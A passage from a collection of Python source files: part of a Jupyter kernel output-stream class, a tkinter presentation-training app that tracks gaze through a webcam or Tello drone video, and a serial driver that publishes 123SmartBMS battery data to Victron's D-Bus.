# waiting across threads during import can cause deadlocks
# so only wait if import lock is not held
if not import_lock_held():
evt = threading.Event()
self.pub_thread.schedule(evt.set)
# and give a timeout to avoid
if not evt.wait(self.flush_timeout):
# write directly to __stderr__ instead of warning because
# if this is happening sys.stderr may be the problem.
print("IOStream.flush timed out", file=sys.__stderr__)
else:
self._flush()
def _flush(self):
"""This is where the actual send happens.
_flush should generally be called in the IO thread,
unless the thread has been destroyed (e.g. forked subprocess).
"""
self._flush_pending = False
self._subprocess_flush_pending = False
if self.echo is not None:
try:
self.echo.flush()
except OSError as e:
if self.echo is not sys.__stderr__:
print("Flush failed: {}".format(e),
file=sys.__stderr__)
data = self._flush_buffer()
if data:
# FIXME: this disables Session's fork-safe check,
# since pub_thread is itself fork-safe.
# There should be a better way to do this.
self.session.pid = os.getpid()
content = {'name':self.name, 'text':data}
self.session.send(self.pub_thread, 'stream', content=content,
parent=self.parent_header, ident=self.topic)
def write(self, string: str) -> int:
"""Write to current stream after encoding if necessary
Returns
-------
len : int
number of items from input parameter written to stream.
"""
if not isinstance(string, str):
raise ValueError(
"TypeError: write() argument must be str, not {type(string)}"
)
if self.echo is not None:
try:
self.echo.write(string)
except OSError as e:
if self.echo is not sys.__stderr__:
print("Write failed: {}".format(e),
file=sys.__stderr__)
if self.pub_thread is None:
raise ValueError('I/O operation on closed file')
else:
is_child = (not self._is_master_process())
# only touch the buffer in the IO thread to avoid races
self.pub_thread.schedule(lambda: self._buffer.write(string))
if is_child:
# mp.Pool cannot be trusted to flush promptly (or ever),
# and this helps.
if self._subprocess_flush_pending:
return
self._subprocess_flush_pending = True
# We can not rely on self._io_loop.call_later from a subprocess
self.pub_thread.schedule(self._flush)
else:
self._schedule_flush()
return len(string)
def writelines(self, sequence):
if self.pub_thread is None:
raise ValueError('I/O operation on closed file')
else:
for string in sequence:
self.write(string)
def writable(self):
return True
def _flush_buffer(self):
"""clear the current buffer and return the current buffer data.
This should only be called in the IO thread.
"""
data = ''
if self._buffer is not None:
buf = self._buffer
self._new_buffer()
data = buf.getvalue()
buf.close()
return data
def _new_buffer(self):
self._buffer = StringIO()
|
test.py
|
from easytello import tello
import threading
import time
import socket
from tkinter import *
import tkinter as tk
from PIL import Image,ImageTk
import tkinter.messagebox
import cv2
import PIL.Image
from gaze_tracking import GazeTracking
root = tk.Tk()
root.title('湧泉相報系統')
root.geometry('1024x600')
root.configure(bg="#FBE5D6")
global button_function_train,button_history,show_top_bar,show_title,show_eye,show_drown,show_train_title,gaze,socket,tello_address
tello_ip = '192.168.10.1'
tello_port = 8889
tello_address = (tello_ip, tello_port)
socket = socket.socket (socket.AF_INET, socket.SOCK_DGRAM)
socket.sendto ('command'.encode (' utf-8 '), tello_address)
socket.sendto ('streamon'.encode (' utf-8 '), tello_address)
gaze = GazeTracking()
###############################################################################################
img_start_1 = Image.open("./image/top_bar.png")
img_start_2 = img_start_1.resize((1024,100),Image.ANTIALIAS)
img_start_3 = ImageTk.PhotoImage(img_start_2)
#首頁標題
img_title_1 = Image.open("./image/title.png")
img_title_2 = img_title_1.resize((450,90),Image.ANTIALIAS)
img_title_3 = ImageTk.PhotoImage(img_title_2)
#眼睛圖示
img_eye_1 = Image.open("./image/eye_icon.png")
img_eye_2 = img_eye_1.resize((150,90),Image.ANTIALIAS)
img_eye_3 = ImageTk.PhotoImage(img_eye_2)
#空拍機圖示
img_drown_1 = Image.open("./image/drown_icon.png")
img_drown_2 = img_drown_1.resize((150,90),Image.ANTIALIAS)
img_drown_3 = ImageTk.PhotoImage(img_drown_2)
#訓練按鈕
train_btn_1 = Image.open("./image/train_btn.png")
train_btn_2 = train_btn_1.resize((300,90),Image.ANTIALIAS)
train_btn_3 = ImageTk.PhotoImage(train_btn_2)
#歷史按鈕
history_btn_1 = Image.open("./image/history.png")
history_btn_2 = history_btn_1.resize((300,90),Image.ANTIALIAS)
history_btn_3 = ImageTk.PhotoImage(history_btn_2)
################################################################################################
#訓練模式 #
train_title_image = Image.open("./image/train_title.png").resize((450,90),Image.ANTIALIAS) #
train_title = ImageTk.PhotoImage(train_title_image)
#返回按鈕圖示
return_icon_1 = Image.open("./image/return_icon.png")
return_icon_2 = return_icon_1.resize((90,90),Image.ANTIALIAS)
return_icon = ImageTk.PhotoImage(return_icon_2)
#home鍵按鈕圖示
home_icon_1 = Image.open("./image/home_icon.png")
home_icon_2 = home_icon_1.resize((90,90),Image.ANTIALIAS)
home_icon = ImageTk.PhotoImage(home_icon_2)
#home鍵按鈕圖示
home_icon_1 = Image.open("./image/home_icon.png")
home_icon_2 = home_icon_1.resize((90,90),Image.ANTIALIAS)
home_icon = ImageTk.PhotoImage(home_icon_2)
#確認鍵按鈕圖示
confirm_icon_1 = Image.open("./image/confirm_icon.png")
confirm_icon_2 = confirm_icon_1.resize((300,90),Image.ANTIALIAS)
confirm_icon = ImageTk.PhotoImage(confirm_icon_2)
###############################################################################################
#報告判斷區sidebar
report_judgment_area_1 = Image.open("./image/report_judgment_area.png")
report_judgment_area_2 = report_judgment_area_1.resize((300,495),Image.ANTIALIAS)
report_judgment_area = ImageTk.PhotoImage(report_judgment_area_2)
#開始報告btn
report_start_icon_1 = Image.open("./image/report_start_icon.png")
report_start_icon_2 = report_start_icon_1.resize((100,60),Image.ANTIALIAS)
report_start_icon = ImageTk.PhotoImage(report_start_icon_2)
#結束報告btn
report_finish_icon_1 = Image.open("./image/report_finish_icon.png")
report_finish_icon_2 = report_finish_icon_1.resize((100,60),Image.ANTIALIAS)
report_finish_icon = ImageTk.PhotoImage(report_finish_icon_2)
#報告名稱的區域
report_name_area_1 = Image.open("./image/report_name_area.png")
report_name_area_2 = report_name_area_1.resize((210,70),Image.ANTIALIAS)
report_name_area = ImageTk.PhotoImage(report_name_area_2)
#顯示判斷區域
judge_area_1 = Image.open("./image/judge_area.png")
judge_area_2 = judge_area_1.resize((170,70),Image.ANTIALIAS)
judge_area = ImageTk.PhotoImage(judge_area_2)
###############################################################################################
#顯示肢體判斷區域
body_score_1 = Image.open("./image/body_score.png")
body_score_2 = body_score_1.resize((420,385),Image.ANTIALIAS)
body_score = ImageTk.PhotoImage(body_score_2)
#顯示眼神判斷區域
eye_score_1 = Image.open("./image/eye_score.png")
eye_score_2 = eye_score_1.resize((420,385),Image.ANTIALIAS)
eye_score = ImageTk.PhotoImage(eye_score_2)
###############################################################################################
#顯示歷史標題
history_icon_1 = Image.open("./image/history_icon.png")
history_icon_2 = history_icon_1.resize((450,90),Image.ANTIALIAS)
history_icon = ImageTk.PhotoImage(history_icon_2)
#顯示歷史報告按鈕
report_history_btn_1 = Image.open("./image/report_history_btn.png")
report_history_btn_2 = report_history_btn_1.resize((400,140),Image.ANTIALIAS)
report_history_btn = ImageTk.PhotoImage(report_history_btn_2)
###############################################################################################
show_top_bar = tk.Label(root, image=img_start_3)
show_title = tk.Label(root, image=img_title_3, bg="#FFD966")
show_eye = tk.Label(root, image=img_eye_3, bg="#FFD966")
show_drown = tk.Label(root, image=img_drown_3, bg="#FFD966")
global g
g=0
panel_for_trt = tk.Label(root,height=500,width=720,bg="#000000") # initialize image panel2
def drone():
my_drone = tello.Tello()
my_drone.takeoff()
for i in range(4):
my_drone.forward(10)
my_drone.cw(90)
my_drone.land()
def open_cam():
global cap
# camera
width, height = 720, 500
cap = cv2.VideoCapture(0)
if cap is None:
print("Camera Open Error")
sys.exit(0)
def drone_cam():
global capture
# camera
print ("Start streaming")
capture = cv2.VideoCapture ('udp:/0.0.0.0:11111',cv2.CAP_FFMPEG)
capture.open('udp:/0.0.0.0:11111')
def drone_stream():
global panel_for_trt,imgtk,gaze,socket,tello_address,capture
ret, frame =capture.read()
gaze.refresh(frame)
frame = gaze.annotated_frame()
text = ""
if gaze.is_blinking():
text = "Blinking"
elif gaze.is_right():
text = "Looking right"
elif gaze.is_left():
text = "Looking left"
elif gaze.is_center():
text = "Looking center"
cv2.putText(frame, text, (90, 60), cv2.FONT_HERSHEY_DUPLEX, 1.6, (147, 58, 31), 2)
left_pupil = gaze.pupil_left_coords()
right_pupil = gaze.pupil_right_coords()
cv2.putText(frame, "Left pupil: " + str(left_pupil), (90, 130), cv2.FONT_HERSHEY_DUPLEX, 0.9, (147, 58, 31), 1)
cv2.putText(frame, "Right pupil: " + str(right_pupil), (90, 165), cv2.FONT_HERSHEY_DUPLEX, 0.9, (147, 58, 31), 1)
img = cv2.resize(frame, dsize=(720, 500), interpolation=cv2.INTER_AREA)
cv2image = cv2.cvtColor(img, cv2.COLOR_BGR2RGBA)#转换颜色从BGR到RGBA
current_image = PIL.Image.fromarray(cv2image)#将图像转换成Image对象
imgtk = PIL.ImageTk.PhotoImage(image=current_image)
panel_for_trt.imgtk = imgtk
panel_for_trt.config(image=imgtk)
root.after(1, drone_stream)
def vid_stream():
global panel_for_trt,imgtk,g,gaze,cap
success,img = cap.read()
# We send this frame to GazeTracking to analyze it
gaze.refresh(img)
img = gaze.annotated_frame()
text = ""
if gaze.is_blinking():
text = "Blinking"
elif gaze.is_right():
text = "Looking right"
elif gaze.is_left():
text = "Looking left"
elif gaze.is_center():
text = "Looking center"
cv2.putText(img, text, (90, 60), cv2.FONT_HERSHEY_DUPLEX, 1.6, (147, 58, 31), 2)
left_pupil = gaze.pupil_left_coords()
right_pupil = gaze.pupil_right_coords()
cv2.putText(img, "Left pupil: " + str(left_pupil), (90, 130), cv2.FONT_HERSHEY_DUPLEX, 0.9, (147, 58, 31), 1)
cv2.putText(img, "Right pupil: " + str(right_pupil), (90, 165), cv2.FONT_HERSHEY_DUPLEX, 0.9, (147, 58, 31), 1)
img = cv2.resize(img, dsize=(720, 500), interpolation=cv2.INTER_AREA)
cv2image = cv2.cvtColor(img, cv2.COLOR_BGR2RGBA)#转换颜色从BGR到RGBA
current_image = PIL.Image.fromarray(cv2image)#将图像转换成Image对象
imgtk = PIL.ImageTk.PhotoImage(image=current_image)
panel_for_trt.imgtk = imgtk
panel_for_trt.config(image=imgtk)
root.after(1, vid_stream)
def del_cap():
global cap,imgtk
cap.release()
imgtk=""
def del_drone_cap():
global capture,imgtk
capture.release()
imgtk=""
def del_main():
global button_function_train,button_history,show_top_bar,show_title,show_eye,show_drown
button_function_train.place_forget(),button_history.place_forget(),show_title.place_forget(),show_eye.place_forget(),show_drown.place_forget()
def do_usb_cam():
t1 = threading.Thread(target = vid_stream)
# t2 = threading.Thread(target = drone)
t1.start()
# t2.start()
def do_drone():
t3 = threading.Thread(target = drone_stream)
t4 = threading.Thread(target = drone)
t3.start()
t4.start()
def choose_delcam(radio_val):
if radio_val == 1:
del_cap()
elif radio_val == 2:
del_drone_cap()
def choose_cam(radio_val):
if radio_val == 1:
open_cam()
vid_stream()
elif radio_val == 2:
drone_cam()
drone_stream()
else:
messagebox = tkinter.messagebox.showinfo('警告','請選擇畫面呈現影像')
def del_train_init_page():
global show_train_title,button_return_icon,button_home_icon,button_confirm_icon,text,content
show_train_title.place_forget(),button_return_icon.place_forget(),button_home_icon.place_forget(),button_confirm_icon.place_forget(),text.place_forget(),
content.place_forget()
def del_train_start_page():
global show_report_judgment_area,button_return_icon,button_home_icon,panel_for_trt,show_train_title,report_start_icon_btn,report_finish_icon_btn,show_report_name_area
global show_judge_area_fun1,show_judge_area_fun2,show_title,fun1_text,fun2_text,drone_sel,cam_sel,radio_text
show_report_judgment_area.place_forget(),button_return_icon.place_forget(),button_home_icon.place_forget(),panel_for_trt.place_forget(),
show_train_title.place_forget(),report_start_icon_btn.place_forget(),report_finish_icon_btn.place_forget(),show_report_name_area.place_forget(),
show_judge_area_fun1.place_forget(),show_judge_area_fun2.place_forget(),show_title.place_forget(),drone_sel.place_forget(),cam_sel.place_forget(),radio_text.place_forget()
del fun1_text,fun2_text
def del_train_finish_page():
global button_return_icon,button_home_icon,show_train_title,show_eye_score,show_body_score
button_return_icon.place_forget(),button_home_icon.place_forget(),show_train_title.place_forget(),show_eye_score.place_forget(),show_body_score.place_forget()
def del_history_init_page():
global show_history_icon,button_return_icon,button_home_icon,report_history_btn1,report_history_btn2,report_history_btn3,report_history_btn4
show_history_icon.place_forget(),button_return_icon.place_forget(),button_home_icon.place_forget(),report_history_btn1.place_forget(),
report_history_btn2.place_forget(),report_history_btn3.place_forget(),report_history_btn4.place_forget()
#輸入主題頁面
def train_init_page():
global show_train_title,button_return_icon,button_home_icon,button_confirm_icon,text,content,theme_var
show_train_title = tk.Label(root,bg="#FFD966", image = train_title)
button_return_icon= tk.Button(root, image=return_icon,bg="#FFD966",command=lambda:[del_train_init_page(),main()], activebackground="#FFD966",bd=0)
button_home_icon= tk.Button(root, image=home_icon,bg="#FFD966",command=lambda:[del_train_init_page(),main()], activebackground="#FFD966",bd=0)
#
button_confirm_icon= tk.Button(root, image=confirm_icon,bg="#FBE5D6",command=lambda:[del_train_init_page(),train_start_page(content.get())], activebackground="#FBE5D6",bd=0)
#
show_train_title.place(x=285,y=5)
button_return_icon.place(x=20,y=5)
button_home_icon.place(x=900,y=5)
button_confirm_icon.place(x=360, y=344)
#輸入框
text = tk.Label(root,font=("Calibri",36), text='請輸入報告主題',bg="#FBE5D6")
text.place(x=345, y=180)
theme_var = tk.StringVar()
content = tk.Entry(root,textvariable=theme_var, bd=3,width=16,font=("Calibri",36))
content.place(x=320, y=267)
#報告開始頁面
def train_start_page(theme_value):
global theme_var,cap
if theme_value == "":
train_init_page()
messagebox = tkinter.messagebox.showinfo('警告','請輸入報告主題')
else:
i = 0
global show_report_judgment_area,button_return_icon,button_home_icon,panel_for_trt,show_train_title,report_start_icon_btn,report_finish_icon_btn,show_report_name_area
global show_judge_area_fun1,show_judge_area_fun2,show_title,show_fun1,show_fun2,fun1_text,fun2_text,drone_sel,cam_sel,radio_text,radio_val
show_train_title = tk.Label(root,bg="#FFD966", image = train_title)
show_report_judgment_area = tk.Label(root,bg="#FBE5D6", image = report_judgment_area)
button_return_icon= tk.Button(root, image=return_icon,bg="#FFD966",command=lambda:[del_train_start_page(),main()], activebackground="#FFD966",bd=0)
button_home_icon= tk.Button(root, image=home_icon,bg="#FFD966",command=lambda:[del_train_start_page(),main()], activebackground="#FFD966",bd=0)
report_start_icon_btn = tk.Button(root, image=report_start_icon, bg="#FFF2CC",command=lambda:[drone_cam(),do_drone()], activebackground="#FFF2CC",bd=0)
report_finish_icon_btn = tk.Button(root, image=report_finish_icon, bg="#FFF2CC",command=lambda:[choose_delcam(radio_val.get()),del_train_start_page(),train_finish_page()], activebackground="#FFF2CC",bd=0)
show_report_name_area = tk.Label(root,bg="#FFF2CC", image = report_name_area)
show_judge_area_fun1 = tk.Label(root,bg="#FFF2CC", image = judge_area)
show_judge_area_fun2 = tk.Label(root,bg="#FFF2CC", image = judge_area)
show_title = tk.Label(show_report_name_area,bg="#F4B183",text=theme_value,font=("Calibri",26))
fun1_text = tk.StringVar()
fun1_text.set("眼神偏移次數:0")
fun2_text = tk.StringVar()
fun2_text.set("身體晃動次數:0")
show_fun1 = tk.Label(show_judge_area_fun1,bg="#FBE5D6",textvariable=fun1_text,font=("Calibri",14))
show_fun2 = tk.Label(show_judge_area_fun2,bg="#FBE5D6",textvariable=fun2_text,font=("Calibri",14))
show_train_title.place(x=285,y=5)
button_return_icon.place(x=20,y=5)
button_home_icon.place(x=900,y=5)
show_report_judgment_area.place(x=0,y=102)
show_report_name_area.place(x=45,y=140)
show_judge_area_fun1.place(x=63,y=230)
show_judge_area_fun2.place(x=63,y=330)
report_start_icon_btn.place(x=30,y=520)
report_finish_icon_btn.place(x=170,y=520)
panel_for_trt.place(x=304,y=102)
show_title.place(x=10,y=10)
show_fun1.place(x=10,y=17)
show_fun2.place(x=10,y=17)
radio_val = IntVar()
def ShowChoice():
print (radio_val.get())
radio_text=tk.Label(root,
text="請選擇呈現影像",bg="#FFF2CC")
drone_sel=Radiobutton(root,
text="攝影機影像",
padx = 20,
indicatoron=0,
variable=radio_val,
bg="#FFF2CC",
value=1)
cam_sel=Radiobutton(root,
text="空拍機影像",
padx = 20,
indicatoron=0,
variable=radio_val,
bg="#FFF2CC",
value=2)
radio_text.place(x=100,y=450)
drone_sel.place(x=45,y=480)
cam_sel.place(x=145,y=480)
theme_var=""
#報告結束頁面
def train_finish_page():
global button_return_icon,button_home_icon,show_train_title,show_eye_score,show_body_score
show_train_title = tk.Label(root,bg="#FFD966", image = train_title)
button_return_icon= tk.Button(root, image=return_icon,bg="#FFD966",command=lambda:[del_train_finish_page(),main()], activebackground="#FFD966",bd=0)
button_home_icon= tk.Button(root, image=home_icon,bg="#FFD966",command=lambda:[del_train_finish_page(),main()], activebackground="#FFD966",bd=0)
show_body_score = tk.Label(root,bg="#FBE5D6", image = body_score)
show_eye_score = tk.Label(root,bg="#FBE5D6", image = eye_score)
show_train_title.place(x=285,y=5)
button_return_icon.place(x=20,y=5)
button_home_icon.place(x=900,y=5)
show_eye_score.place(x=550,y=160)
show_body_score.place(x=50,y=160)
def history_init_page():
global show_history_icon,button_return_icon,button_home_icon,report_history_btn1,report_history_btn1,report_history_btn2,report_history_btn3,report_history_btn4
show_history_icon = tk.Label(root,bg="#FFD966", image = history_icon)
button_return_icon= tk.Button(root, image=return_icon,bg="#FFD966",command=lambda:[del_history_init_page(),main()], activebackground="#FFD966",bd=0)
button_home_icon= tk.Button(root, image=home_icon,bg="#FFD966",command=lambda:[del_history_init_page(),main()], activebackground="#FFD966",bd=0)
report_history_btn1 = tk.Button(root, image=report_history_btn,bg="#FBE5D6",command=lambda:[del_history_init_page(),main()], activebackground="#FBE5D6",bd=0)
report_history_btn2 = tk.Button(root, image=report_history_btn,bg="#FBE5D6",command=lambda:[del_history_init_page(),main()], activebackground="#FBE5D6",bd=0)
report_history_btn3 = tk.Button(root, image=report_history_btn,bg="#FBE5D6",command=lambda:[del_history_init_page(),main()], activebackground="#FBE5D6",bd=0)
report_history_btn4 = tk.Button(root, image=report_history_btn,bg="#FBE5D6",command=lambda:[del_history_init_page(),main()], activebackground="#FBE5D6",bd=0)
show_history_icon.place(x=285,y=5)
button_return_icon.place(x=20,y=5)
button_home_icon.place(x=900,y=5)
report_history_btn1.place(x=70 ,y=180)
report_history_btn2.place(x=70 ,y=380)
report_history_btn3.place(x=550 ,y=180)
report_history_btn4.place(x=550 ,y=380)
def main():
global button_function_train,button_history,show_top_bar,show_title,show_eye,show_drown
button_function_train= tk.Button(root, image=train_btn_3,bg="#FBE5D6",command=lambda:[del_main(),train_init_page()], activebackground="#FBE5D6",bd=0)
button_history= tk.Button(root, image=history_btn_3,bg="#FBE5D6",command=lambda:[del_main(),history_init_page()], activebackground="#FBE5D6",bd=0)
show_title = tk.Label(root,bg="#FFD966", image = img_title_3)
show_top_bar.place(x=-2,y=0)
show_title.place(x=285,y=5)
show_eye.place(x=20,y=5)
show_drown.place(x=850,y=3)
button_function_train.place(x=360, y=222)
button_history.place(x=360, y=377)
main()
root.mainloop()
|
smartbms.py
|
#!/usr/bin/env python3
import argparse
import os
import serial
import serial.tools.list_ports
import struct
import sys
import threading
import time
from collections import deque
from datetime import datetime
from dbus.mainloop.glib import DBusGMainLoop
from gi.repository import GLib
# Victron packages
sys.path.insert(1, os.path.join(os.path.dirname(__file__), '/opt/victronenergy/dbus-systemcalc-py/ext/velib_python'))
import dbus.service
import ve_utils
from vedbus import VeDbusService
from settingsdevice import SettingsDevice
class SmartBMS:
BMS_COMM_TIMEOUT = 10 # Seconds
BMS_COMM_BLOCK_SIZE = 58
def __init__(
self,
dev
):
self.last_received = 0
self.pack_voltage = 0
self.charge_current = 0
self.discharge_current = 0
self.pack_current = 0
self.soc = 0
self.lowest_cell_voltage = 0
self.lowest_cell_voltage_num = 0
self.highest_cell_voltage = 0
self.highest_cell_voltage_num = 0
self.lowest_cell_temperature = 0
self.lowest_cell_temperature_num = 0
self.highest_cell_temperature = 0
self.highest_cell_temperature_num = 0
self.cell_count = 0
self.capacity = 0
self.energy_stored = 0
self.balance_voltage = 0
self.alarm_minimum_voltage = 0
self.alarm_maximum_voltage = 0
self.alarm_minimum_temperature = 0
self.alarm_maximum_temperature = 0
self.alarm_cell_communication = 0
self.allowed_to_charge = 0
self.allowed_to_discharge = 0
self.lock = threading.Lock()
self._poller = threading.Thread(target=lambda:self._poll(dev))
self._poller.daemon = True
self._poller.start()
@property
def alarm_serial_communication(self):
if(time.time() > self.last_received + self.BMS_COMM_TIMEOUT):
return True
else:
return False
def determine_nominal_voltage(self):
if(self.balance_voltage >= 3.4 and self.balance_voltage <= 3.6): return 3.3
if(self.balance_voltage >= 3.9 and self.balance_voltage <= 4.4): return 3.65
if(self.balance_voltage >= 2.5 and self.balance_voltage <= 2.7): return 2.3
return 0
def _poll(self, dev, test_packet = ''):
try:
# The SmartBMS transmit each 500ms or 1000ms a message containing 58 bytes
# When the serial does not contain any new bytes and no complete message was received, empty the buffer and wait for a new message
#logging.debug("Parse Packet [" + str(len(packet)) + "] bytes")
buffer = bytearray (self.BMS_COMM_BLOCK_SIZE)
buffer_index = 0
time.sleep(1)
self._ser = serial.Serial(dev, 9600)
while(1):
if (len(test_packet) > 0):
read_data = test_packet
else:
waiting_bytes = self._ser.in_waiting
read_data = self._ser.read(waiting_bytes)
if(len(read_data) > 0):
for c in read_data:
if(buffer_index <= self.BMS_COMM_BLOCK_SIZE-1):
buffer[buffer_index] = c
buffer_index += 1
if(buffer_index == self.BMS_COMM_BLOCK_SIZE):
checksum = 0
for i in range (self.BMS_COMM_BLOCK_SIZE-1):
checksum += buffer[i]
received_checksum = buffer[self.BMS_COMM_BLOCK_SIZE-1]
if((checksum & 0xff) == received_checksum):
self.lock.acquire()
self.pack_voltage = self._decode_voltage(buffer[0:3])
self.charge_current = self._decode_current(buffer[3:6])
self.discharge_current = self._decode_current(buffer[6:9])
self.pack_current = self._decode_current(buffer[9:12])
self.soc = buffer[40]
self.lowest_cell_voltage = self._decode_voltage(buffer[12:14])
self.lowest_cell_voltage_num = buffer[14]
self.highest_cell_voltage = self._decode_voltage(buffer[15:17])
self.highest_cell_voltage_num = buffer[17]
self.lowest_cell_temperature = self._decode_temperature(buffer[18:20])
self.lowest_cell_temperature_num = buffer[20]
self.highest_cell_temperature = self._decode_temperature(buffer[21:23])
self.highest_cell_temperature_num = buffer[23]
self.cell_count = buffer[25]
self.capacity = self._decode_value(buffer[49:51], 0.1)
self.energy_stored = self._decode_value(buffer[34:37], 1)
self.balance_voltage = self._decode_voltage(buffer[55:57])
self.alarm_minimum_voltage = True if (buffer[30] & 0b00001000) else False
self.alarm_maximum_voltage = True if (buffer[30] & 0b00010000) else False
self.alarm_minimum_temperature = True if (buffer[30] & 0b00100000) else False
self.alarm_maximum_temperature = True if (buffer[30] & 0b01000000) else False
self.alarm_cell_communication = True if (buffer[30] & 0b00000100) else False
self.allowed_to_discharge = True if (buffer[30] & 0b00000010) else False
self.allowed_to_charge = True if (buffer[30] & 0b00000001) else False
self.last_received = time.time()
self.lock.release()
buffer_index = 0
elif(len(read_data) == 0):
buffer_index = 0
time.sleep(0.2)
except Exception as e:
print('Fatal exception: ')
print(e)
mainloop.quit()
def _decode_current(self, raw_value):
if(raw_value[0] == ord('X')):
return 0
elif(raw_value[0] == ord('-')):
factor = -1
else:
factor = 1
return factor*round(0.125*struct.unpack('>H', raw_value[1:3])[0],1)
def _decode_value(self, raw_value, multiplier):
if(len(raw_value) == 3):
value = struct.unpack('>L', bytearray(b'\x00')+raw_value)[0]
else:
value = struct.unpack('>H', raw_value[0:2])[0]
return round(multiplier*value,2)
def _decode_voltage(self, raw_value):
return self._decode_value(raw_value, 0.005)
def _decode_temperature(self, raw_value):
return round(struct.unpack('>H', raw_value[0:2])[0]*0.857-232,0)
class SmartBMSDbus():
def __init__(self, dev, serial_id):
self._BMS = SmartBMS(dev)
self._dev = dev
self._serial_id = serial_id
self.comm_error_shadow = False
self._current_filter = deque()
self._nominal_pack_voltage = 0
self._info = {
'name' : "123SmartBMS",
'servicename' : "smartbms",
'id' : 0,
'version' : 0.6
}
self._gettexts = {
'/ConsumedAmphours': {'gettext': '%.1FAh'},
'/System/MaxCellVoltage': {'gettext': '%.2FV'},
'/System/MinCellVoltage': {'gettext': '%.2FV'},
'/Dc/0/Voltage': {'gettext': '%.2FV'},
'/Dc/0/Current': {'gettext': '%.1FA'},
'/Dc/0/Power': {'gettext': '%.0FW'},
'/Soc': {'gettext': '%.0F%%'},
'/Capacity': {'gettext': '%.1FkWh'},
'/InstalledCapacity': {'gettext': '%.1FkWh'}
}
device_port = args.device[dev.rfind('/') + 1:]
device_port_num = device_port[device_port.rfind('USB') + 3:]
self._dbusservice = VeDbusService("com.victronenergy.battery." + device_port)
# Create the management objects, as specified in the ccgx dbus-api document
self._dbusservice.add_path('/Mgmt/ProcessName', __file__)
self._dbusservice.add_path('/Mgmt/ProcessVersion', self._info['version'])
self._dbusservice.add_path('/Mgmt/Connection', ' Serial ' + dev)
# Create the basic objects
self._dbusservice.add_path('/DeviceInstance', 288+int(device_port_num))
self._dbusservice.add_path('/ProductId', self._info['id'])
self._dbusservice.add_path('/ProductName', self._info['name'])
self._dbusservice.add_path('/FirmwareVersion', self._info['version'])
self._dbusservice.add_path('/HardwareVersion', None)
self._dbusservice.add_path('/Serial', self._serial_id)
self._dbusservice.add_path('/Connected', 1)
# Create device list
self._dbusservice.add_path('/Devices/0/DeviceInstance', 0x288+int(device_port_num))
self._dbusservice.add_path('/Devices/0/FirmwareVersion', self._info['version'])
self._dbusservice.add_path('/Devices/0/ProductId', self._info['id'])
self._dbusservice.add_path('/Devices/0/ProductName', self._info['name'])
self._dbusservice.add_path('/Devices/0/ServiceName', self._info['servicename'])
self._dbusservice.add_path('/Devices/0/VregLink', "(API)")
# Create the bms paths
self._dbusservice.add_path('/TimeToGo', None)
self._dbusservice.add_path('/SystemSwitch', None)
self._dbusservice.add_path('/Dc/0/Temperature', None)
self._dbusservice.add_path('/Io/AllowToCharge', None)
self._dbusservice.add_path('/Io/AllowToDischarge', None)
self._dbusservice.add_path('/Info/UpdateTimestamp', None)
#self._dbusservice.add_path('/Voltages/Cell1', None)
#self._dbusservice.add_path('/Voltages/Cell2', None)
self._dbusservice.add_path('/System/MinVoltageCellId', None)
self._dbusservice.add_path('/System/MaxVoltageCellId', None)
self._dbusservice.add_path('/System/MinCellTemperature', None)
self._dbusservice.add_path('/System/MinTemperatureCellId', None)
self._dbusservice.add_path('/System/MaxCellTemperature', None)
self._dbusservice.add_path('/System/MaxTemperatureCellId', None)
self._dbusservice.add_path('/System/NrOfModulesOnline', None)
self._dbusservice.add_path('/System/NrOfModulesOffline', None)
self._dbusservice.add_path('/System/NrOfModulesBlockingCharge', None)
self._dbusservice.add_path('/System/NrOfModulesBlockingDischarge', None)
self._dbusservice.add_path('/Alarms/LowVoltage', None)
self._dbusservice.add_path('/Alarms/HighVoltage', None)
self._dbusservice.add_path('/Alarms/LowTemperature', None)
self._dbusservice.add_path('/Alarms/HighTemperature', None)
# Register paths with custom texts
for path in self._gettexts.keys():
self._dbusservice.add_path(path, value=None, gettextcallback=self._gettext)
# Register persistent settings
self._settings_register()
# Register paths which can be externally changed, for example via the GUI
self._dbusservice.add_path('/CustomName', value=self._settings['CustomName'], writeable=True, onchangecallback=self._settext)
def update(self):
# The BMS data readout and variable writing happens on a different thread -> lock before
self._BMS.lock.acquire()
if(self._BMS.alarm_cell_communication or self._BMS.alarm_serial_communication):
self._dbusservice["/Soc"] = None
self._dbusservice["/SystemSwitch"] = None
self._dbusservice["/ConsumedAmphours"] = None
self._dbusservice["/Capacity"] = None
self._dbusservice["/InstalledCapacity"] = None
self._dbusservice['/TimeToGo'] = None
self._dbusservice["/Dc/0/Voltage"] = None
self._dbusservice["/Dc/0/Current"] =None
self._dbusservice["/Dc/0/Power"] = None
self._dbusservice["/Dc/0/Temperature"] = None
self._dbusservice["/Io/AllowToCharge"] = None
self._dbusservice["/Io/AllowToDischarge"] = None
self._dbusservice["/System/MinCellVoltage"] = None
self._dbusservice["/System/MinVoltageCellId"] = None
self._dbusservice["/System/MaxCellVoltage"] = None
self._dbusservice["/System/MaxVoltageCellId"] = None
self._dbusservice["/System/MinCellTemperature"] = None
self._dbusservice["/System/MinTemperatureCellId"] = None
self._dbusservice["/System/MaxCellTemperature"] = None
self._dbusservice["/System/MaxTemperatureCellId"] = None
self._dbusservice["/System/NrOfModulesOnline"] = 0
self._dbusservice["/System/NrOfModulesOffline"] = 1
self._dbusservice["/System/NrOfModulesBlockingCharge"] = None
self._dbusservice["/System/NrOfModulesBlockingDischarge"] = None
self._dbusservice["/Alarms/LowVoltage"] = None
self._dbusservice["/Alarms/HighVoltage"] = None
self._dbusservice["/Alarms/LowTemperature"] = None
self._dbusservice["/Alarms/HighTemperature"] = None
else:
self._dbusservice["/Soc"] = self._BMS.soc
self._dbusservice["/SystemSwitch"] = 1
self._dbusservice["/Capacity"] = self._BMS.capacity
self._dbusservice["/InstalledCapacity"] = self._BMS.capacity
self._dbusservice["/Dc/0/Voltage"] = self._BMS.pack_voltage
self._dbusservice["/Dc/0/Current"] = self._BMS.pack_current
self._dbusservice["/Dc/0/Power"] = self._BMS.pack_voltage * self._BMS.pack_current
self._dbusservice["/Dc/0/Temperature"] = self._BMS.highest_cell_temperature
self._dbusservice["/Io/AllowToCharge"] = int(self._BMS.allowed_to_charge)
self._dbusservice["/Io/AllowToDischarge"] = int(self._BMS.allowed_to_discharge)
self._dbusservice["/System/MinCellVoltage"] = self._BMS.lowest_cell_voltage
self._dbusservice["/System/MinVoltageCellId"] = self._BMS.lowest_cell_voltage_num
self._dbusservice["/System/MaxCellVoltage"] = self._BMS.highest_cell_voltage
self._dbusservice["/System/MaxVoltageCellId"] = self._BMS.highest_cell_voltage_num
